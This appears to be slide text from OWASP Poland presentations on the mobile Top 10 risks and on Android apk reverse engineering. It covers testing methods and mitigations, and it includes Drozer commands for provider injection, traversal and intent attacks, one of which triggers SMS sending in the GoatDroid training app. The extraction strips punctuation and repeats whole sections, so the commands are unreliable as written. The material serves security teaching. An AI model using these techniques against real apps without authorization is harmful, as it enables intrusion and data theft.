Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
